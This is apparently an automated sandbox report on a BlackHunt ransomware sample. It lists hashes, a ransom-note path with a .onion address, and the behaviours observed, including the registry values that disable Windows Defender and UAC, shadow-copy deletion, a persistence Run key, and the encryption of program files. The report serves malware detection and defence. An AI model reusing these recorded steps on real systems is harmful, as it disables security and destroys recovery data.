Analysis
-
max time kernel
125s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 01:03
Static task
static1
Behavioral task
behavioral1
Sample
d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe
Resource
win10v2004-20231222-en
General
-
Target
d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe
-
Size
707KB
-
MD5
1c767e2c119c2eead94cb02d753c555a
-
SHA1
22bd7269ffcb6d72fad0d4aeb5fb5825143bedef
-
SHA256
d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a
-
SHA512
20ff3c1f1d4b725fa4dfe1e54d08979f43223ca67356befdb82ed343766a30e8efa10fbabec2481f0ea7adbc2a8ef665ed9ade849ed33f93c2c6f3eb4888d139
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1J8Dvnh:6uaTmkZJ+naie5OTamgEoKxLWsjh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1620 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2828 bcdedit.exe 3240 bcdedit.exe -
Renames multiple (2889) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2644 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\M: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\E: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\U: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\J: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\B: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\W: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\A: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\L: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\R: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\Z: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\X: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\Q: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\T: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\O: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\G: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\H: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\V: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\I: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\S: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\P: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\K: d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#BlackHunt_ReadMe.hta d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\#BlackHunt_Private.key d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#BlackHunt_Private.key d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-static.png d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Hobart d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\#BlackHunt_ReadMe.hta d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#BlackHunt_ReadMe.hta d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\#BlackHunt_ReadMe.txt d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_Private.key d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\#BlackHunt_ReadMe.txt d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\#BlackHunt_ReadMe.txt d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#BlackHunt_Private.key d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_filter\#BlackHunt_ReadMe.hta d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\#BlackHunt_Private.key d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.hta d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#BlackHunt_Private.key d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\#BlackHunt_Private.key d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Esl\#BlackHunt_ReadMe.hta d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#BlackHunt_ReadMe.txt d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#BlackHunt_ReadMe.txt d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\#BlackHunt_Private.key d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+4 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\#BlackHunt_Private.key d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\#BlackHunt_ReadMe.hta d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#BlackHunt_Private.key d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\#BlackHunt_ReadMe.hta d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#BlackHunt_Private.key d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIcon.png d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\#BlackHunt_ReadMe.hta d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\#BlackHunt_ReadMe.txt d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#BlackHunt_ReadMe.txt d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fakaofo d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2420 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1768 vssadmin.exe 2528 vssadmin.exe 2500 vssadmin.exe 1968 vssadmin.exe 2276 vssadmin.exe -
Modifies registry class 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 bcdedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ bcdedit.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe Token: SeRestorePrivilege 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe Token: SeBackupPrivilege 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe Token: SeTakeOwnershipPrivilege 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe Token: SeAuditPrivilege 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe Token: SeSecurityPrivilege 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe Token: SeIncBasePriorityPrivilege 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe Token: SeBackupPrivilege 2676 vssvc.exe Token: SeRestorePrivilege 2676 vssvc.exe Token: SeAuditPrivilege 2676 vssvc.exe Token: SeBackupPrivilege 3472 wbengine.exe Token: SeRestorePrivilege 3472 wbengine.exe Token: SeSecurityPrivilege 3472 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2820 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 29 PID 2372 wrote to memory of 2820 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 29 PID 2372 wrote to memory of 2820 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 29 PID 2372 wrote to memory of 2820 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 29 PID 2372 wrote to memory of 2804 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 30 PID 2372 wrote to memory of 2804 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 30 PID 2372 wrote to memory of 2804 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 30 PID 2372 wrote to memory of 2804 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 30 PID 2372 wrote to memory of 2792 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 33 PID 2372 wrote to memory of 2792 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 33 PID 2372 wrote to memory of 2792 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 33 PID 2372 wrote to memory of 2792 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 33 PID 2372 wrote to memory of 2980 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 34 PID 2372 wrote to memory of 2980 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 34 PID 2372 wrote to memory of 2980 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 34 PID 2372 wrote to memory of 2980 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 34 PID 2372 wrote to memory of 2576 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 36 PID 2372 wrote to memory of 2576 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 36 PID 2372 wrote to memory of 2576 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 36 PID 2372 wrote to memory of 2576 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 36 PID 2804 wrote to memory of 2936 2804 cmd.exe 40 PID 2804 wrote to memory of 2936 2804 cmd.exe 40 PID 2804 wrote to memory of 2936 2804 cmd.exe 40 PID 2980 wrote to memory of 2592 2980 cmd.exe 39 PID 2980 wrote to memory of 2592 2980 cmd.exe 39 PID 2980 wrote to memory of 2592 2980 cmd.exe 39 PID 2372 wrote to memory of 948 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 41 PID 2372 wrote to memory of 948 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 41 PID 2372 wrote to memory of 948 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 41 PID 2372 wrote to memory of 948 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 41 PID 2372 wrote to memory of 2892 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 42 PID 2372 wrote to memory of 2892 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 42 PID 2372 wrote to memory of 2892 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 42 PID 2372 wrote to memory of 2892 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 42 PID 2372 wrote to memory of 2744 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 44 PID 2372 wrote to memory of 2744 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 44 PID 2372 wrote to memory of 2744 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 44 PID 2372 wrote to memory of 2744 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 44 PID 2372 wrote to memory of 2684 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 46 PID 2372 wrote to memory of 2684 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 46 PID 2372 wrote to memory of 2684 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 46 PID 2372 wrote to memory of 2684 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 46 PID 2372 wrote to memory of 2572 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 48 PID 2372 wrote to memory of 2572 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 48 PID 2372 wrote to memory of 2572 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 48 PID 2372 wrote to memory of 2572 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 48 PID 2372 wrote to memory of 2588 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 50 PID 2372 wrote to memory of 2588 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 50 PID 2372 wrote to memory of 2588 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 50 PID 2372 wrote to memory of 2588 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 50 PID 2372 wrote to memory of 2636 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 52 PID 2372 wrote to memory of 2636 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 52 PID 2372 wrote to memory of 2636 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 52 PID 2372 wrote to memory of 2636 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 52 PID 2372 wrote to memory of 2648 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 53 PID 2372 wrote to memory of 2648 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 53 PID 2372 wrote to memory of 2648 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 53 PID 2372 wrote to memory of 2648 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 53 PID 2372 wrote to memory of 3052 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 55 PID 2372 wrote to memory of 3052 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 55 PID 2372 wrote to memory of 3052 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 55 PID 2372 wrote to memory of 3052 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 55 PID 2372 wrote to memory of 2348 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 56 PID 2372 wrote to memory of 2348 2372 d6b2563b1c0945578596d4da4dd39457124d4880369f1d95f81de9eb44ef1f5a.exe 56 -
System policy modification 1 TTPs 3 IoCs
